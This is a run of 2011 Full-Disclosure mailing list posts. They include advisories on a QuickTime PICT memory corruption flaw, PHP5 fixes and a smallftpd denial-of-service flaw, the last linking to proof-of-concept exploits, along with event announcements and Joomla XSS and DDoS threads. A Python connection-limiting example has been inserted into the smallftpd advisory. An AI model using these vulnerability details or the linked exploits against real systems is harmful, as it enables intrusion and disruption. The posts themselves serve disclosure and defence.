-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 11429. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime Player. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within how the application parses a Matrix
structure within a particular opcode embedded within a .pict file. When
using this Matrix structure to transform image data, the application
will miscalculate an index to represent a row of an object. This will
cause the application to write outside the bounds of the array of
objects which can lead to code execution under the context of the
application.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT4723

-- Disclosure Timeline:
2011-04-11 - Vulnerability reported to vendor
2011-06-29 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Subreption LLC

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] [DSA 2266-1] php5 security update

2011-06-29 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2266-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
June 29, 2011  http://www.debian.org/security/faq
- -

Package: php5
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2010-2531 CVE-2011-0420 CVE-2011-0421 CVE-2011-0708 
 CVE-2011-1153 CVE-2011-1466 CVE-2011-1471 CVE-2011-2202 

Several vulnerabilities were discovered in PHP, which could lead to 
denial of service or potentially the execution of arbitrary code.

CVE-2010-2531

   An information leak was found in the var_export() function.

CVE-2011-0421

   The Zip module could crash.

CVE-2011-0708

   An integer overflow was discovered in the Exif module.

CVE-2011-1466

   An integer overflow was discovered in the Calendar module.

CVE-2011-1471

   The Zip module was prone to denial of service through malformed
   archives.

CVE-2011-2202

   Path names in form based file uploads (RFC 1867) were incorrectly 
   validated.

This update also fixes two bugs, which are not treated as security
issues, but fixed nonetheless, see README.Debian.security for details
on the scope of security support for PHP (CVE-2011-0420, CVE-2011-1153).

For the oldstable distribution (lenny), this problem has been fixed in
version 5.2.6.dfsg.1-1+lenny12.

For the stable distribution (squeeze), this problem has been fixed in
version 5.3.3-7+squeeze3.

For the unstable distribution (sid), this problem has been fixed in
version 5.3.6-12.

We recommend that you upgrade your php5 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk4LcUoACgkQXm3vHE4uylqCbACg2vzq7Fl2cNdA22fY2PM36cjq
rREAn097NPV6k3RfopU9I+WEvZGaIzpC
=zfHE
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Resolved - NNT Change Tracker - Hard-Coded Encryption Key - Originally posted as http://seclists.org/fulldisclosure/2011/May/460

2011-06-29 Thread NNT Support
Background
-

The product employs a portion of legacy code as referenced in the original
post. This is used for the product key and some database entries but whilst
the strength of the encryption being used here may be a problem for the NNT
licensing team, there is no genuine security risk for device data. This
portion of code has subsequently been replaced in Versions 5 and patches are
available from www.nntws.com

Change Tracker works on the principle of layered, multi-dimensional security
in line with the PCI DSS that it is commonly used to underpin. The secure
commissioning process should include standard lockdown and
access-restriction procedures for the Change Tracker server and database
server used for device and configuration data storage. Access security
should also be complemented with monitoring using a SIEM solution such as
NNT Log Tracker, so any access to the Change Tracker server, the Change
Tracker console program or the database will be logged and alerted as
unusual activity. 

NNT take security of our customer systems extremely seriously. Anyone with
any concerns regarding best practice in Production System security should
contact us for further assistance. 

Regarding any vulnerabilities discovered by independent security researchers
in the future, we would prefer these are reported to us at supp...@nntws.com
before being published. This was not the case in this instance, delaying our
opportunity to respond. Thank you.

Company Homepage
--

http://www.newnettechnologies.com



Regards

NNT Support


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [Spanish] Free course: Linux exploit development - ASCII Armor Bypass Return-To-PLT

2011-06-29 Thread runlvl
This Saturday, "2 July at 11:00", a free 3-hour course on computer
security will be given at Castro Barros 183 1-5 (Argentina).

* In it we will cover the development of exploits for Linux systems and
how to use the ASCII Armor Bypass Return-To-PLT technique, and we will
also see why techniques such as Return-To-Libc are of no use these days.
* Attendance is free and no low-level knowledge of any kind is required;
as I always say, it is better that you come and ask a thousand questions
than that you stay away and miss the chance to take the course.
* In it we will see the development of an exploit for Linux; we will use
a debugger and apply Return-To-PLT to bypass the system's protections.

Why do we run the courses? Because nothing like this exists in
Argentina, least of all on computer security. Also because we want to
demystify development, and knowing in depth how our computers really
work at a low level is without doubt how we can prevent problems and
keep up to date with the day-to-day of the security world.

We hope to see you this Saturday; if you can bring something to drink or
eat, the rest of the attendees will be grateful.

If possible, confirm by email, since the venue is not very big, to:
jsa...@insecurityresearch.com

Regards, and we hope to see you there!

How to get there:

Subte (underground) Line A, Castro Barros station
The 128 and 160 buses leave you at the door
It is 2 blocks from the bar "Las Violetas"

Juan Sacco


[Full-disclosure] S3cC0n Security Conference

2011-06-29 Thread secc0n Conference
Dear Security researchers,
S3cC0n, an Indian internet security researcher team, invites you to join
us on the 7th, 8th, and 9th of July for the annual disclosure of exploits and
security research. For the last 2 years we have been organizing this conference with 56
researchers. S3cC0n is proud to announce the launch of its security and
hacking conference in INDIA. This conference will bring together security
researchers, security professionals, vendors, and law enforcement agencies
from all over the country to a common platform to discuss the latest research in the
field of information security and in particular the major security threats
faced by everyone today.
S3cC0n is a one-of-a-kind conference showcasing the latest research and
trends in information security by renowned security
researchers/professionals.
The following topics are covered:
Web application – Security is not separate
Cross interface attack (CIA)
Web Trend – Exploited browser
SQLXSS (SQL Injections XSS)
Remote Code execution in Dev
Document rendering attack
XML authoring flow
WAF Bypass Methods
Web Widget interface flaw
Persistent Redirection flaw
Declarative security
Content Delivery networks – Stringency
Many more private 0days will be disclosed at the conference...
Topic information with the schedule of discussion topics and author names will
be displayed soon.

For more details please shoot us a mail at s3c...@gmail.com

Best Regards,

S3cC0n Team

Download PDF :
http://dl.dropbox.com/u/18007092/Dear_Security_researchers.pdf

[Full-disclosure] smallftpd <= 1.0.3-fix | Connection Saturation Remote Denial of Service Vulnerability

2011-06-29 Thread YGN Ethical Hacker Group
smallftpd <= 1.0.3-fix  | Connection Saturation Remote Denial of
Service Vulnerability




1. OVERVIEW

The smallftpd FTP server is found to be vulnerable to denial of
service in handling multiple connection requests regardless of its
maximum connection settings. Upon successful DoS exploit, the
smallftpd will crash or reject new FTP login requests.


2. BACKGROUND

The smallftpd FTP server is a small and simple multi-threaded FTP
server for Windows.


3. VERSIONS AFFECTED

1.0.3-fix and earlier


4. PROOF-OF-CONCEPT/EXPLOIT

http://dev.metasploit.com/redmine/attachments/1330/smallftpd103fix_saturation.rb
http://www.exploit-db.com/download/17455


5. SOLUTION

The vendor has discontinued this product and therefore has no patch or
upgrade that mitigates this problem. It is recommended that an
alternate software package be used in its place.


6. VENDOR

Arnaud Mary


7. CREDIT

This vulnerability was discovered by Myo Soe, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


8. REFERENCES

Original Advisory URL:
http://core.yehg.net/lab/pr0js/advisories/smallftpd_103-fix_saturation_dos
SmallFTPD Home Page: http://smallftpd.sourceforge.net/
SmallFTPD Download Stat:
http://sourceforge.net/project/stats/?group_id=104723&ugn=smallftpd&type=&mode=alltime

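A defensive illustration of the check the advisory says is missing, added here as example code and not the smallftpd project's own: an accept-loop limiter that enforces a global and a per-source connection cap before any worker thread or session state is allocated, so a saturating client is refused cheaply. The class and function names and the caps are assumptions.

```python
import threading
from collections import Counter


class ConnectionLimiter:
    """Global and per-source cap on live connections (added example, not
    smallftpd's code): the check runs before a worker thread or any
    login state is allocated, which is where the advisory says it is missing."""

    def __init__(self, max_total, max_per_source):
        self.max_total = max_total
        self.max_per_source = max_per_source
        self._lock = threading.Lock()
        self._per_source = Counter()
        self._total = 0
        self.rejected = 0  # export this; a spike is the saturation signal

    def try_acquire(self, source_ip):
        """Reserve a slot; False means the caller must close the socket."""
        with self._lock:
            if (self._total >= self.max_total
                    or self._per_source[source_ip] >= self.max_per_source):
                self.rejected += 1
                return False
            self._total += 1
            self._per_source[source_ip] += 1
            return True

    def release(self, source_ip):
        """Free the slot when the session ends (call from a finally block)."""
        with self._lock:
            if self._per_source[source_ip] > 0:
                self._per_source[source_ip] -= 1
                self._total -= 1


def guarded_accept(limiter, conn, source_ip, handler):
    """One accept-loop step: refuse over-limit clients before spending a worker."""
    if not limiter.try_acquire(source_ip):
        conn.close()  # cheap refusal: no thread, no session state
        return False

    def run():
        try:
            handler(conn)
        finally:
            limiter.release(source_ip)

    threading.Thread(target=run, daemon=True).start()
    return True
```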


Re: [Full-disclosure] Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities

2011-06-29 Thread Jacqui Caren-home
On 29/06/2011 02:40, Nick FitzGerald wrote:
> The kind of problems that scream "Why would anyone in their right mind
> use it?"

The official line.

http://forum.joomla.org/viewtopic.php?f=432&t=335090

and a good example of how CVE's are handled

http://forum.joomla.org/viewtopic.php?f=432&t=631398



Re: [Full-disclosure] Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities

2011-06-29 Thread Jacqui Caren-home
On 29/06/2011 02:40, Nick FitzGerald wrote:
> Christian Sciberras wrote:
>
>> Rather than that, I'd say the dev team is out of sync with the security
>> team..
>
> Assuming that that may be a reasonable one-sentence encapsulation of
> how Joomla development is organized...
>
> The fact such a sentence can be meaningfully uttered tells us there
> are major problems _inherent_ in Joomla.

What I find worrying is that I cannot see the test suite anywhere.
Have I missed the link; is it secret or non-existent?

Jacqui

http://forum.joomla.org/viewtopic.php?f=681&t=624023&sid=e07f7a089ae6ca49291960fb1744de51

I would have thought they would be asking for help to migrate tests into one of
the free-to-use CI systems available to floss projects.



Re: [Full-disclosure] how to detect DDoS attack through HTTP response analysis(throuput)

2011-06-29 Thread Ferenc Kovacs
2011/6/29 coderman :
> 2011/6/26 김무성 :
>> ...
>> I'm looking for materials or information, research about how to detect
>> DDoS attack through HTTP response analysis (throughput).
>
> you're asking the wrong question.
>
> instead of asking "How can I automagically detect exploitation of my
> shitty app via HTTP Resp. codes"
>
> ask: "Why is my webapp so shitty that any number of arbitrary requests
> lead to resource exhaustion?"
>

because fetching (or pretending to fetch) the result is always less
resource-intensive than generating it?
o_O

Tyrael
